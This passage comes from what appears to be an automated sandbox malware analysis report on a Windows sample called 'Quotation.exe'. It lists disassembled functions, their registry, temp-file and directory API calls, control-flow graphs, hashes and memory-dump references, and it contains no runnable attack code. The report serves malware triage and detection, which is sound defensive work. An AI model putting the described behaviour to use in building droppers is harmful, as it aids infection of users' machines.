                                                              • Associated: 00000000.00000002.2393936631.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2394039644.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: DirectoryLibraryLoadSystemwsprintf
                                                              • String ID: %s%S.dll$UXTHEME
                                                              • API String ID: 2200240437-1106614640
                                                              • Opcode ID: 7a73cbb44207cafadb11ab8eaaa41fd963bfa172cfc882b2dd9c54e233860d96
                                                              • Instruction ID: d40490b37a95929041f6b14fe17981fa15644a851550e805e000283098582d10
                                                              • Opcode Fuzzy Hash: 7a73cbb44207cafadb11ab8eaaa41fd963bfa172cfc882b2dd9c54e233860d96
                                                              • Instruction Fuzzy Hash: 41F0FC31511119AACF10BB64DD0DF9B375C9B00305F10847AE546F10D0EB789A68CBA8
                                                              Function 00402EAE Relevance: 7.6, APIs: 5, Instructions: 84registryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 770 402eae-402ed7 call 40638e 772 402edc-402ee0 770->772 773 402f91-402f95 772->773 774 402ee6-402eea 772->774 775 402eec-402f0d RegEnumValueW 774->775 776 402f0f-402f22 774->776 775->776 777 402f76-402f84 RegCloseKey 775->777 778 402f4b-402f52 RegEnumKeyW 776->778 777->773 779 402f24-402f26 778->779 780 402f54-402f66 RegCloseKey call 406915 778->780 779->777 781 402f28-402f3c call 402eae 779->781 785 402f86-402f8c 780->785 786 402f68-402f74 RegDeleteKeyW 780->786 781->780 788 402f3e-402f4a 781->788 785->773 786->773 788->778
                                                              APIs
                                                              • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402F02
                                                              • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F4E
                                                              • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F57
                                                              • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F6E
                                                              • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F79
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2393908135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2393893435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393921503.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2394039644.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: CloseEnum$DeleteValue
                                                              • String ID:
                                                              • API String ID: 1354259210-0
                                                              • Opcode ID: 2404979ab5d72bd1f47e4c5d2100d154d2dcf156ce7fec90999c2a50aae3b712
                                                              • Instruction ID: 48bf034c557530f45265713f896c64b121a5f1f2f5b25ab6521791cb913d5ed3
                                                              • Opcode Fuzzy Hash: 2404979ab5d72bd1f47e4c5d2100d154d2dcf156ce7fec90999c2a50aae3b712
                                                              • Instruction Fuzzy Hash: 74215A7150010ABFDF119F90CE89EEF7B7DEB54388F110076B949B11A0D7B49E54AA68
                                                              Function 73421817 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 789 73421817-73421856 call 73421bff 793 73421976-73421978 789->793 794 7342185c-73421860 789->794 795 73421862-73421868 call 7342243e 794->795 796 73421869-73421876 call 73422480 794->796 795->796 801 734218a6-734218ad 796->801 802 73421878-7342187d 796->802 803 734218af-734218cb call 73422655 call 73421654 call 73421312 GlobalFree 801->803 804 734218cd-734218d1 801->804 805 73421898-7342189b 802->805 806 7342187f-73421880 802->806 827 73421925-73421929 803->827 810 734218d3-7342191c call 73421666 call 73422655 804->810 811 7342191e-73421924 call 73422655 804->811 805->801 812 7342189d-7342189e call 73422e23 805->812 808 73421882-73421883 806->808 809 73421888-73421889 call 73422b98 806->809 815 73421890-73421896 call 73422810 808->815 816 73421885-73421886 808->816 823 7342188e 809->823 810->827 811->827 820 734218a3 812->820 826 734218a5 815->826 816->801 816->809 820->826 823->820 826->801 831 73421966-7342196d 827->831 832 7342192b-73421939 call 73422618 827->832 831->793 837 7342196f-73421970 GlobalFree 831->837 839 73421951-73421958 832->839 840 7342193b-7342193e 832->840 837->793 839->831 842 7342195a-73421965 call 734215dd 839->842 840->839 841 73421940-73421948 840->841 841->839 843 7342194a-7342194b FreeLibrary 841->843 842->831 843->839
                                                              APIs
                                                                • Part of subcall function 73421BFF: GlobalFree.KERNEL32(?), ref: 73421E74
                                                                • Part of subcall function 73421BFF: GlobalFree.KERNEL32(?), ref: 73421E79
                                                                • Part of subcall function 73421BFF: GlobalFree.KERNEL32(?), ref: 73421E7E
                                                              • GlobalFree.KERNEL32(00000000), ref: 734218C5
                                                              • FreeLibrary.KERNEL32(?), ref: 7342194B
                                                              • GlobalFree.KERNEL32(00000000), ref: 73421970
                                                                • Part of subcall function 7342243E: GlobalAlloc.KERNEL32(00000040,?), ref: 7342246F
                                                                • Part of subcall function 73422810: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,73421896,00000000), ref: 734228E0
                                                                • Part of subcall function 73421666: wsprintfW.USER32 ref: 73421694
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2432204448.0000000073421000.00000020.00000001.01000000.00000005.sdmp, Offset: 73420000, based on PE: true
                                                              • Associated: 00000000.00000002.2432044113.0000000073420000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000000.00000002.2432399195.0000000073424000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000000.00000002.2432790406.0000000073426000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_73420000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: Global$Free$Alloc$Librarywsprintf
                                                              • String ID:
                                                              • API String ID: 3962662361-3916222277
                                                              • Opcode ID: 2f991ef0a9332dbd4685eb1006dab531fafd388fd698e7374459a483a2cf0cde
                                                              • Instruction ID: a9d466580fe9d3dcc9ed44e3f3995c2a9418dab8de845a2dd23d32ca0e66ed9e
                                                              • Opcode Fuzzy Hash: 2f991ef0a9332dbd4685eb1006dab531fafd388fd698e7374459a483a2cf0cde
                                                              • Instruction Fuzzy Hash: BD418272400345AFEB0D9F25DCC4B953FBCAF05356F184469ED4BBA2C6DB788085CAA8
                                                              Function 0040248F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64registrystringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsd350B.tmp,00000023,00000011,00000002), ref: 004024DA
                                                              • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsd350B.tmp,00000000,00000011,00000002), ref: 0040251A
                                                              • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsd350B.tmp,00000000,00000011,00000002), ref: 00402602
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2393908135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2393893435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393921503.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2394039644.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: CloseValuelstrlen
                                                              • String ID: C:\Users\user\AppData\Local\Temp\nsd350B.tmp
                                                              • API String ID: 2655323295-3684517792
                                                              • Opcode ID: 8e1b5111da33e5837339166b14f546e7548dccb5c0fd5daf16ba01e681e634b0
                                                              • Instruction ID: 9515a87f615354861ff9cc8d48f56862c3e7cd04d157db2ad705c0a1b7eb65e0
                                                              • Opcode Fuzzy Hash: 8e1b5111da33e5837339166b14f546e7548dccb5c0fd5daf16ba01e681e634b0
                                                              • Instruction Fuzzy Hash: 45116D71900118BEEB11EFA5DE59AAEBAB4AF54318F10443FF504B61C1C7B98E419A58
                                                              Function 00406040 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetTickCount.KERNEL32 ref: 0040605E
                                                              • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,004034FA,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037E6), ref: 00406079
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2393908135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2393893435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393921503.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2394039644.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: CountFileNameTempTick
                                                              • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                              • API String ID: 1716503409-44229769
                                                              • Opcode ID: 017de5c5da22b1c6cf72d7a8a287ef2c48f88e3ac937424cf3c6df762bd8e462
                                                              • Instruction ID: 4304e6ca34acc2e603ac9508cdf3fa98200610ac432ccd05af3fd9fdb7d66135
                                                              • Opcode Fuzzy Hash: 017de5c5da22b1c6cf72d7a8a287ef2c48f88e3ac937424cf3c6df762bd8e462
                                                              • Instruction Fuzzy Hash: 58F09676B40204FBDB10CF55ED05F9EB7ACEB95750F11403AEE05F7140E6B099548768
                                                              Function 004015C6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00405E9B: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsd350B.tmp,?,00405F0F,C:\Users\user\AppData\Local\Temp\nsd350B.tmp,C:\Users\user\AppData\Local\Temp\nsd350B.tmp,75923420,?,C:\Users\user\AppData\Local\Temp\,00405C4D,?,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Quotation.exe"), ref: 00405EA9
                                                                • Part of subcall function 00405E9B: CharNextW.USER32(00000000), ref: 00405EAE
                                                                • Part of subcall function 00405E9B: CharNextW.USER32(00000000), ref: 00405EC6
                                                              • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161F
                                                                • Part of subcall function 00405A75: CreateDirectoryW.KERNELBASE(?,?), ref: 00405AB7
                                                              • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\ethnocentrism\skggene\Egyptians218,?,00000000,000000F0), ref: 00401652
                                                              Strings
                                                              • C:\Users\user\ethnocentrism\skggene\Egyptians218, xrefs: 00401645
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2393908135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2393893435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393921503.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2394039644.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                              • String ID: C:\Users\user\ethnocentrism\skggene\Egyptians218
                                                              • API String ID: 1892508949-4259118363
                                                              • Opcode ID: 7f503c08a0778f4355e9e2823a57a0c055de55569a85c0f729d9efbbf8a88517
                                                              • Instruction ID: ceaefb5432ba9a2b041ab88b04bec91c1a8495824eafa6d8534a6d53eb807851
                                                              • Opcode Fuzzy Hash: 7f503c08a0778f4355e9e2823a57a0c055de55569a85c0f729d9efbbf8a88517
                                                              • Instruction Fuzzy Hash: 2D11D031504604ABCF206FA5CD4099F36B0EF04368B29493FE941B22E1DA3E4E819E8E
                                                              Function 004063EF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • RegQueryValueExW.KERNELBASE(?,00000000,00000000,?,?,00000800,00000000,?,?,?,?,Call,?,00000000,00406660,80000002), ref: 00406435
                                                              • RegCloseKey.ADVAPI32(?), ref: 00406440
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2393908135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2393893435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393921503.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2394039644.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                              Similarity
                                                              • API ID: CloseQueryValue
                                                              • String ID: Call
                                                              • API String ID: 3356406503-1824292864
                                                              • Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                                              • Instruction ID: 441e6d046e2572fd66e4c77006f0a98464fe89a944563537cf106c849ea921cc
                                                              • Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                                              • Instruction Fuzzy Hash: 4F017172500209ABDF218F51CD05EDB3BA9EB54354F01403AFD1992191D738D968DF94
                                                              Function 00407074 Relevance: 5.2, APIs: 4, Instructions: 236COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2393908135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2393893435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393921503.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2394039644.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: aff26f2f30a057b7958a1e63094fc459aa306f2dc33e22a09454c964c074026f
                                                              • Instruction ID: 2d246cc9a99bab59b70d05231fecbcf7b107c6ac3beee636f2a296df3f85dc82
                                                              • Opcode Fuzzy Hash: aff26f2f30a057b7958a1e63094fc459aa306f2dc33e22a09454c964c074026f
                                                              • Instruction Fuzzy Hash: 7DA14571E04228DBDF28CFA8C8546ADBBB1FF44305F10816AD856BB281D7786986DF45
                                                              Function 00407275 Relevance: 5.2, APIs: 4, Instructions: 208COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2393908135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2393893435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393921503.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2394039644.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3ac8a4bfdb441625c816955e49305bbe8ba575533dfee591c2cbe8a61bd4ebd3
                                                              • Instruction ID: 7b0bebd33542e08950ef610181a47380a5391ae5859bceecccad38cd1577eaed
                                                              • Opcode Fuzzy Hash: 3ac8a4bfdb441625c816955e49305bbe8ba575533dfee591c2cbe8a61bd4ebd3
                                                              • Instruction Fuzzy Hash: 90911370E04228CBDF28CF98C854BADBBB1FF44305F14816AD856BB291D778A986DF45
                                                              Function 00406F8B Relevance: 5.2, APIs: 4, Instructions: 205COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2393908135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2393893435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393921503.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2394039644.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4946c792fe510ceb6f898f1d350858136886e798b9c642bfd65d449563e2a9d8
                                                              • Instruction ID: bb56daa647bdc5b8eebe4baaa8fd529e9884befb34821132b6d53cadc5dab3c5
                                                              • Opcode Fuzzy Hash: 4946c792fe510ceb6f898f1d350858136886e798b9c642bfd65d449563e2a9d8
                                                              • Instruction Fuzzy Hash: 84814571E04228DBDF24CFA8C844BADBBB1FF44305F24816AD456BB281D778A986DF05
                                                              Function 00406A90 Relevance: 5.2, APIs: 4, Instructions: 198COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2393908135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2393893435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393921503.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2394039644.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 40acfd0569c51a0ed8326a41ceea3e1cadcd4e5eff2ca22ce679809f46488b45
                                                              • Instruction ID: 4c059968f2e2b24eb1e5e0c9ef09b3253d11b2009d36a285a9eb138ea7c1b005
                                                              • Opcode Fuzzy Hash: 40acfd0569c51a0ed8326a41ceea3e1cadcd4e5eff2ca22ce679809f46488b45
                                                              • Instruction Fuzzy Hash: 5B815971E04228DBDF24CFA8C8447ADBBB0FF44305F20816AD456BB281D7786986DF45
                                                              Function 00406EDE Relevance: 5.2, APIs: 4, Instructions: 180COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2393908135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2393893435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393921503.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2394039644.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7ecfdc6a50dff7d8916ace13d1bdc0889b51af96eca2ccc09b1dd9eb10df24f6
                                                              • Instruction ID: d60cf97a253a7e6a69b3ee1887f4eadeccf904993e12f72ad3f9abe973951288
                                                              • Opcode Fuzzy Hash: 7ecfdc6a50dff7d8916ace13d1bdc0889b51af96eca2ccc09b1dd9eb10df24f6
                                                              • Instruction Fuzzy Hash: A1711371E04228DBDF24CFA8C844BADBBB1FF44305F15806AD856BB281D778A986DF45
                                                              Function 00406FFC Relevance: 5.2, APIs: 4, Instructions: 170COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2393908135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2393893435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393921503.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2393936631.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2394039644.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c11de4171378e898cf9dd0cf6cc2122b5d0c7e9a287f85b53884598f27a71e29
                                                              • Instruction ID: 85b777fa610547d2183482adb232412925907ddbdaa1129d6a49a25a13354a82
                                                              • Opcode Fuzzy Hash: c11de4171378e898cf9dd0cf6cc2122b5d0c7e9a287f85b53884598f27a71e29
                                                              • Instruction Fuzzy Hash: 9D714671E04228DBDF28CF98C844BADBBB1FF44305F14816AD856BB281D778A986DF45
                                                              Function 00406F48 Relevance: 5.2, APIs: 4, Instructions: 168COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2393908135.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
